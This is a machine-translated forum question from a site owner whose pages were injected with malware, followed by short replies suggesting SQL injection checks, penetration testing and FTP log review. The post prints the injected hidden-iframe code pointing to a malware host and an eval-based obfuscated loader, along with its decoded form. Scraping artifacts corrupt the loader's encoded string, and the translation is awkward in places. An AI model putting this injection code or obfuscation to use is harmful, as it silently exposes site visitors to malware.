다음 코드가 저희 사이트에 추가되었습니다. 아래는 페이지에 미치는 영향입니다. 기본적으로 맬웨어 사이트에 iframe을 여는 것입니다. 저희 사이트는 지난주에 겪었던 문제를 해결하기 위해 문제를 해결하기 위해 데이터베이스와 코드베이스를 롤백했습니다. 내가 사용할 수있는 손상된 버전이 있는데 코드가 들어있는 위치와 방법을 검색하지만 아무 것도 필요 없습니다. 사이트에 어떤 형식으로 입력 한 경우 해당 항목이 db에서 어떤 모습일까요? 코드베이스에서 파일을 수정했다면 왜 찾을 수 없습니까? 나는 무엇을 찾고 있어야 하는가? 이것에 대한 어떤 통찰력이라도 도움이 될 것입니다. 보안을 어디에 연결해야하는지 파악하려고합니다.Sql Injection Attack Insight
참고 : 원본 스크립트에는 줄 바꿈이 없습니다.
<div id="mgkc"><iframe src="http://216.119.114.164/esd.php" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;"></iframe></div>
<div id="houe"><iframe src="http://216.119.114.164/esd.php" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;"></iframe></div>
: 그것은 같은 div
요소를 주입한다 (function() {
var houe = document.createElement('iframe');
houe.src = 'http://216.119.114.164/esd.php';
houe.style.position = 'absolute';
houe.style.border = '0';
houe.style.height = '1px';
houe.style.width = '1px';
houe.style.left = '1px';
houe.style.top = '1px';
if (!document.getElementById('houe')) {
document.write('<div id=\'houe\'></div>');
document.getElementById('houe').appendChild(houe);
}
})();
:
<script type="text/javascript" charset="utf-8">
p=parseInt;ss=(123)?String.fromCharCode:0;asgq="[email protected][email protected]!20!7b!d!a!20!20!20!20!76!61!72!20!68!6f!75!65!20!3d!20!64!6f!63!7[email protected][email protected]!3b!d!a!d!a!20!20!20!20!68!6f!75!65!2[email protected]!2e!31!31!34!2e!31!36!34!2f!65[email protected][email protected][email protected]!6f!6e!20!3d!20!27!61!62[email protected]!6c!65!2e!62!6f!72!64!65[email protected][email protected]!67!68!74!20[email protected][email protected]!64!74!68!20[email protected]!6c!65!2e!6c!65!66!74!20[email protected]!6c![email protected]!66!20!28!2[email protected][email protected][email protected][email protected]!20!7b[email protected][email protected][email protected][email protected][email protected]!3b!d!a!20!20!20!20!20!20!20!2[email protected][email protected][email protected][email protected][email protected][email protected][email protected]!3b"
.replace(/@/g,"9")
.split("!");
try{
document.body&=0.1
} catch(gdsgsdg) {
zz=3;
dbshre=103;
if(dbshre){
vfvwe=0;
try{
document;
} catch(agdsg){
vfvwe=1;
}
if(!vfvwe){
e=eval;
}
s="";
if(zz)
for(i=0;i-480!=0;i++){
if(window.document)
s+=ss(p(asgq[i],16));
}
if(window.document)
e(s);
}
}
</script>
내장 진수 코드는 다음과 같은 자바 스크립트로 해결 : 선이 읽을 수있는 코드를 만들 나누기로 여기에 표시됩니다
코드에서 SQL 삽입을 어떻게 막고 있습니까? – PeeHaa
인터넷에 침투 테스터가 있습니다. 아마도 서비스에 가입하고 웹 응용 프로그램을 사용할 수 있습니까? 구멍이있는 곳을 알려줍니다. – halfer
누군가 당신의 FTP 사용자 이름/암호를 알아내는 것만 큼 간단 할 수 있습니다. 웹 사이트에 반드시 문제가있는 것은 아닙니다. 로그 파일을 확인할 수도 있습니다. – hvd